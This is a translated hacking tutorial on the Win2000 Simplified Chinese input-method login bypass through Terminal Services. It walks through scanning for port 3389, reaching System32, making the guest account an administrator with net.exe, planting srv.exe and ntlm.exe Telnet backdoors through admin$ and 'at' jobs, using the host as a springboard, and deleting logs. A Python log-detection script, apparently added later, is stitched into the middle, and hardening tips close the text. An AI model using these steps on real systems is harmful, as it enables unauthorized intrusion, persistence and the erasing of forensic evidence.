The Win2000 Simplified Chinese edition has a vulnerability in its input method that allows a local user to bypass the authentication mechanism and get into the system. Experiments show that the vulnerability is still present in the Terminal Services of the Win2000 Simplified Chinese edition during remote operation, which makes it dangerous.
Terminal Services is a Win2000 feature that lets the system administrator operate the machine remotely through a graphical interface, so that a user can control the computer remotely; the default port is 3389. As long as a user has the Win2000 Client Connection Manager installed, he can connect to any computer that has the service enabled. This vulnerability therefore turns Terminal Services into a "legal Trojan" on Win2000.
Tool: Client Connection Manager. Download address: look for it yourself; there are several kinds around.
Intrusion steps:
First, get an administrator account.
Scan a network segment with the scanner set to port 3389. Run the Client Connection Manager, add any of the scanned addresses, configure the Client Connection Manager, and then connect to the server. After a few seconds the Win2000 login screen appears (if it turns out to be the English or Traditional Chinese version, give up and change to another address). Use Ctrl+Shift to switch input methods quickly and switch to Quanpin (full Pinyin); the input method status bar then appears in the lower-left corner of the login screen (if it does not, be patient, because the other side's data stream takes time to arrive). Right-click the Microsoft logo on the status bar and a "Help" item pops up. If "Help" is greyed out, give up, because the other side has very likely found and patched this vulnerability. Open "Help", and in the "Operation Guide" section right-click the taskbar at the top; a menu pops up, and you open "Jump to URL". At this point the Win2000 system installation path appears together with a blank field for the path we fill in. For example, if the system is installed on drive C, fill in "C:\WinNT\System32" in the blank field and press "OK". We have now bypassed authentication and entered the system's System32 directory.
Now we need to get an account and become a legitimate user of the system. Find "net.exe" in this directory and create a shortcut to it. Right-click the shortcut, "Properties" -> "Target" -> c:\winnt\system32\net.exe; the part after it is empty, so fill in "user guest /active:yes" and click "OK". This step uses net.exe to activate the guest account, which is disabled. Of course you could also use "user username password /add" to create a new account, but that is easy to notice. Run this shortcut; you will not see anything running, but the guest user has been activated. Then modify the shortcut, fill in "user guest password", and run it, so that guest now has a password. Finally modify it once more, fill in "localgroup administrators guest /add", and guest becomes a system administrator.
Notes: 1. During this process, if the other party is running Terminal Services Manager, he will see the process ID you opened, your IP and machine name, and can even send you a message. 2. The terminal server only gives you one minute to authenticate, and you cannot finish the above operations in that time; you can only connect again. 3. The images and operations you see are delayed, depending on network speed.
Second, create a springboard.
Log in to the terminal server again, this time entering as "guest"; by now guest is already a system administrator and can run everything. Open "Control Panel", go to "Network and Dial-up Connections", and in the properties of "Local Area Connection" or "Dial-up Connection" see whether the other party has selected "File and Printer Sharing for Microsoft Networks". If not, tick it; once it is in use, the network shares will be open next time.
Exit the other party's system and at the local command prompt type:
net use \\IP address\ipc$ "password" /user:"guest"
and the remote login over IPC succeeds.
After success, copy a Telnet program over: srv.exe from the Tools directory of "Small Shura Express", and also ntlm.exe for later. This program opens a Telnet service on the other side; the port is 99.
copy c:\hack\srv.exe \\***.***.***.***\admin$
Then use the scheduler service to start it. First find out the other party's time:
net time \\***.***.***.***
displays:
Current time at \\***.***.***.*** is 2001/1/8 PM 08:55
The command completed successfully.
Then start srv.exe:
at \\***.***.***.*** 09:00 srv.exe
displays:
Added a new job with job ID = 0
After a few minutes:
telnet ***.***.***.*** 99
There is no authentication; you log in directly and see:
C:\WINNT\system32>
We have logged in successfully. Then open another command prompt window locally and type:
copy c:\hack\ntlm.exe \\211.21.193.202\admin$
to copy ntlm.exe from the local hack directory over. Then go back to the Telnet window and run ntlm.exe:
C:\WINNT\system32>ntlm
displays:
Windows 2000 Telnet Dump, By Assassin, All Rights Reserved. Done!
C:\WINNT\system32>
OK, now for Win2000's own Telnet. First stop the Telnet service that srv.exe started:
net stop telnet
The system tells you that Telnet has not been started; ignore it and continue:
net start telnet
This time Telnet really starts. We can now telnet from another command prompt window to the other party's port 23, authenticate with our guest account and password, and it really becomes our springboard, which we can use against other hosts.
Third, sweep away the footprints: delete the shortcut created for net.exe, and delete the log files under winnt\system32\logfiles.
Fixes: 1. Patch. 2. Delete the input method help files. 3. Stop Terminal Services.
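A defender-side correlation check for the sequence described above, added here as an illustration and not part of the original article. It scans log lines in a simplified "<date> <time> <source> <message>" layout that I have constructed (not a real Windows 2000 event export) for the walkthrough's stages: guest activation, a guest password being set, guest joining Administrators, a scheduled job, and a Telnet service start, and reports which of them occur within one time window.

```python
import re
from datetime import datetime
# Constructed sample log in a hypothetical "<date> <time> <source> <message>" layout (not a real Win2000 export).
SAMPLE_LOG = """\
2001-01-08 20:52:10 Security User Account Enabled: Target Account Name: Guest
2001-01-08 20:52:35 Security User Account Password Set: Target Account Name: Guest
2001-01-08 20:53:02 Security Local Group Member Added: Member Name: Guest Target Account Name: Administrators
2001-01-08 20:57:48 Schedule Scheduled job ID 0 created: srv.exe
2001-01-08 21:00:15 SCM The Telnet service entered the running state.
"""

# The stages of the walkthrough, in the order the intruder performs them.
STAGES = [
    ("guest_enabled", re.compile(r"User Account Enabled:.*\bGuest\b")),
    ("guest_password_set", re.compile(r"Password Set:.*\bGuest\b")),
    ("guest_in_administrators", re.compile(r"Member Added:.*Member Name: Guest.*Administrators")),
    ("at_job_created", re.compile(r"Scheduled job .* created")),
    ("telnet_started", re.compile(r"Telnet service entered the running state")),
]
LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (.*)$")

def parse(line):
    """Split one constructed log line into (timestamp, source, message), or None."""
    m = LINE_RE.match(line)
    try:
        return datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"), m.group(2), m.group(3)
    except (AttributeError, ValueError):  # no match, or the first tokens are not a timestamp
        return None

def match_stages(log_text, window_minutes=30):
    """Stage names seen within window_minutes of the earliest hit, in walkthrough order."""
    hits = {}
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ts, _source, msg = rec
        for name, pat in STAGES:
            if name not in hits and pat.search(msg):  # first matching line per stage counts
                hits[name] = ts
    if not hits:
        return []
    first = min(hits.values())
    return [n for n, _ in STAGES
            if n in hits and (hits[n] - first).total_seconds() <= window_minutes * 60]

def is_guest_escalation(log_text):
    """The core of the technique: Guest enabled and then placed in Administrators."""
    seen = match_stages(log_text)
    return "guest_enabled" in seen and "guest_in_administrators" in seen
```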
Win2000 Server 3389 security problem: the correct approach
Go to windowsupdate.microsoft.com and install all critical updates. Then pay attention to the administrator password: at least 8 characters mixing digits and letters, and best with a symbol! (This is very important; symbols meaning !%#$& and the like.) Then, on the prerequisite that this machine does not need to be accessed by other machines in the LAN, create a run.bat file containing:
net share ipc$ /del
net share admin$ /del
net share c$ /del
net share d$ /del
... one line for each partition you have, and save it to the Startup menu. Then disable RunAs Service, Remote Registry Service and Task Scheduler, and set DNS, DHCP and similar services to manual as well. Turn off services such as Quota and Daytime to prevent DoS. In IIS, remove the .ida, .idq and .printer mappings. Use IPsec filters to block external network access to ports 135, 139, 445 and 3389.
Also, if MSSQL is installed, change the default empty SA password, and change MySQL's root password. And if your website has an attachment upload feature, make sure to filter the extensions! It is best not to use the phpBB forum; a vulnerability was found in it recently.